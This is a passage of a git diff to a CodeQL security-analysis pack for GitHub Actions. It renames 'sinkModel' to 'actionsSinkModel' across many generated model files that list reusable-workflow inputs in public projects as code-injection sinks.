@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
index ea55d53c215f..6e7fdc34a54b 100644
--- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
index add2fe0d2e2e..8fc02a27e1cd 100644
--- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
index 400cd50b59f9..80f19676b4a7 100644
--- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
index 42122b5ee22a..56b2ef6691e4 100644
--- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
index c694d3953f63..7bc952a84834 100644
--- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
index 9ecf401cab50..1c0663dd01c6 100644
--- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
index 19fee627702a..4da8f3276622 100644
--- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
index 4eb201001e14..4e8adfafe3c2 100644
--- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
index 94c7292b655e..28cb702ce13c 100644
--- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
index 6088ffcd7023..cb315ee4328c 100644
--- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
index 05c4dc8ddf37..956c4cba9669 100644
--- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
index affc12cdc4ad..804c1bdae4e2 100644
--- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
index b1c4d2f2cbfd..78d91b2afb5f 100644
--- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
index 4ccbd71f8c36..31cadc3ff179 100644
--- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
index 2eb2104b542a..11362fda1e55 100644
--- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
index fee958600308..131cff3e92a8 100644
--- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
index 49a98d4dda55..acc5bf51e357 100644
--- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
index aa432107a0d1..c89d1c808c30 100644
--- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
index 40053c68c1a2..0258c79e83f6 100644
--- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
index 645ec756783f..ebeba1eb2268 100644
--- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5e..5f709385839a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe8..e96dbba0699d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c7..2a7a9afd5a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d167..5094422f3fed 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f9..dff837456454 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3c..88b68dc4ea7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830a..18c6974c74f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e150..561c3e15e641 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd74..961741f413f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa2..985652a265b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be176..3103913ab4f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e85246..b89c1307d2d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8eed..9e60cc61bb56 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef1..cac4e298538b 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f3..eb2669a96ead 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89c..590e518d3508 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145d..d55af595b1cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c9613..1fd6cd394bcc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749dd..3583052045b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde7..f355ceee6da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946b..2b9190c87af8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a82488530..783ff3c04682 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a8..de853d30588b 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c0..31f09278ecd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml 